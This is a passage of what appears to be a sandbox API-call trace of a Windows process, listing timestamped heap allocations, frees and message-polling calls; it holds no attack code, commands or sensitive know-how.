Size=0x20) returned 0xbfe050 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9af0 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018f8 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b78 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.413] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0257.413] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe078 | out: hHeap=0xbc0000) returned 1 [0257.413] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b78 | out: hHeap=0xbc0000) returned 1 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe078 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01b78 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe190 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b08 [0257.413] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01968 [0257.413] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01968 | out: hHeap=0xbc0000) returned 1 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0xc) returned 0xcda660 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1b8 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9da8 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01968 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9be0 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x40) returned 0xbfb0d8 [0257.414] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe1e0 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9df0 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01878 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d90 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe208 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ac0 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01928 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda618 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01938 [0257.414] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda648 | out: hHeap=0xbc0000) returned 1 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda648 [0257.414] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01938 | out: hHeap=0xbc0000) returned 1 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe230 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ce8 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01938 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9dd8 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe258 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9e08 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01988 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9bf8 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.414] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe280 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d60 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01958 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9b50 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9d48 [0257.415] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.415] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01978 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d5e0 [0257.415] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda678 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda708 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.415] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.415] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019c8 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda678 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda708 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcda690 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01978 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.416] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x38) returned 0xc3d620 [0257.416] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc018c8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc01998 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.416] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.416] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc018c8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc019a8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc018c8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcda690 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.417] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019a8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc019c8 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x1) returned 0xc019b8 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01998 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01998 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019b8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019c8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc019a8 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.417] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.417] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.417] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.417] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.418] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.418] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.418] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.418] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.418] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.419] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.419] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.419] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xbfe2a8 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.419] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01978 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01978 | out: hHeap=0xbc0000) returned 1 [0257.419] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfe2a8 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9ad8 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9c40 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xc01b58 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9c40 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xc01b58 | out: hHeap=0xbc0000) returned 1 [0257.420] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9ad8 | out: hHeap=0xbc0000) returned 1 [0257.420] PeekMessageW (in: lpMsg=0x7df984, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df984) returned 0 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xc01b58 [0257.420] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 